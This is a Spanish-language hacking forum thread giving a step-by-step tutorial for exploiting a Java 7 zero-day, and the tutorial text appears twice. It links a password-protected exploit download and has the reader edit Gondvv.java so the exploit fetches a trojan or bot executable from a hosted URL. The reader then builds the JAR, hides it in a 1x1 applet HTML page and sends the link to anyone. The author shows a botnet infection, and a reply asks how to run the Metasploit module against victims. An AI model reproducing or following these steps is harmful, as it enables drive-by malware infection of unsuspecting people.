(http://www.cioal.com/wp-content/uploads/java2.png)
Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.
Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.
En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.
Empecemos.
Descargamos el Exploit:
http://www.sendspace.com/file/6kef9v
Pass: calebbucker
Necesitaremos el Programa Eclipse:
http://www.eclipse.org/downloads/packages/eclipse-ide-java-ee-developers/indigosr2
Disponible 32 y 64 bits, descargue dependiendo de su S.O
Instalamos JAVA 7: http://java.softonic.com/
Iniciamos Eclipse, seleccionamos File - Import:
(http://i45.tinypic.com/egqu7m.png)
Seleccionamos General - Proyectos Existentes en el Área de Trabajo:
(http://i49.tinypic.com/168hr80.png)
Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es
C:\Documents and Settings\TioSam\Escritorio\exploit2(http://i50.tinypic.com/ih47k7.png)
Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("http://www.sitio-web.com/file.exe");
(http://i46.tinypic.com/2lk4ths.png)
Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.
(http://i46.tinypic.com/vy9vrp.png)
(http://i45.tinypic.com/sw6cs7.png)
Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:
(http://i47.tinypic.com/2h3omqp.png)
El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:
(http://i49.tinypic.com/bkkld.png)
Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es:
C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar (http://i46.tinypic.com/201kk8.png)
Terminado ese paso le damos Next, Next y Finish.
Ahora, creamos un archivo html con el siguiente código:
<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>
En mi caso el codigo queda de la siguiente manera:
<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>
(http://i46.tinypic.com/34gk5ci.png)
Esos archivos la subimos en nuestro Host el
test.jar, index.html y applet1.class, de preferencia de pago.
Ahora solo queda enviar el link: www.sitio-web.com/index.html a cualquier persona.
En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(
(http://i46.tinypic.com/zsvibo.png)
Esta vulnerabilidad también puede ser explotada desde Metasploit:
http://www.metasploit.com/modules/exploit/multi/browser/java_jre17_exec
Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.
Saludos.
PARCHE: http://java.com/es/download/manual.jsp?locale=es
Es parecido a un Exploit Kit.
Debería salirte algo asi: http://dueduap.net/index.html
Saludos.
Adjunto el parche al hilo.
El parche se encuentra disponible: http://java.com/es/download/manual.jsp?locale=es
De 10 personas solo 8 actualizaran.
Cita de: hace 3 días
http://vimeo.com/48323225
P.D.: El vídeo lo puse también para una demostración, es para complementar la información aquí presente.
Saludos.
Ya salio la actualizacion obligatoria con el parche.
Hoy mismo se estaran actualizando todas las pc con java
Una duda con respecto a metasploit el funcionamiento seria así: ejecuto metasploit con mi ip publica algo como 209.55.102.3 y ejecuto el exploit con esa ip, si todo va bien se inicia el servidor con la siguiente url 209.55.102.3:4444 y esa es la url que le debo enviar a la victima, una ves que el haga clic activa la conexión con mi exploit que esta en escucha y como resultado daría una session en el metasploit, creo que esos son los pasos a seguir o se requiere de algo adicional
Saludos ;)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
(http://www.cioal.com/wp-content/uploads/java2.png)
Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.
Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.
En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.
Empecemos.
Descargamos el Exploit:
http://www.sendspace.com/file/6kef9v
Pass: calebbucker
Necesitaremos el Programa Eclipse:
http://www.eclipse.org/downloads/packages/eclipse-ide-java-ee-developers/indigosr2
Disponible 32 y 64 bits, descargue dependiendo de su S.O
Instalamos JAVA 7: http://java.softonic.com/
Iniciamos Eclipse, seleccionamos File - Import:
(http://i45.tinypic.com/egqu7m.png)
Seleccionamos General - Proyectos Existentes en el Área de Trabajo:
(http://i49.tinypic.com/168hr80.png)
Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2
(http://i50.tinypic.com/ih47k7.png)
Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("http://www.sitio-web.com/file.exe");
(http://i46.tinypic.com/2lk4ths.png)
Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.
(http://i46.tinypic.com/vy9vrp.png)
(http://i45.tinypic.com/sw6cs7.png)
Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:
(http://i47.tinypic.com/2h3omqp.png)
El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:
(http://i49.tinypic.com/bkkld.png)
Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar
(http://i46.tinypic.com/201kk8.png)
Terminado ese paso le damos Next, Next y Finish.
Ahora, creamos un archivo html con el siguiente código:
<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>
En mi caso el codigo queda de la siguiente manera:
<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>
(http://i46.tinypic.com/34gk5ci.png)
Esos archivos la subimos en nuestro Host, de preferencia de pago.
Ahora solo queda enviar el link: www.sitio-web.com/index.html a cualquier persona.
En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(
(http://i46.tinypic.com/zsvibo.png)
Esta vulnerabilidad también puede ser explotada desde Metasploit:
http://www.metasploit.com/modules/exploit/multi/browser/java_jre17_exec
Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.
Saludos.
PARCHE: http://java.com/es/download/manual.jsp?locale=es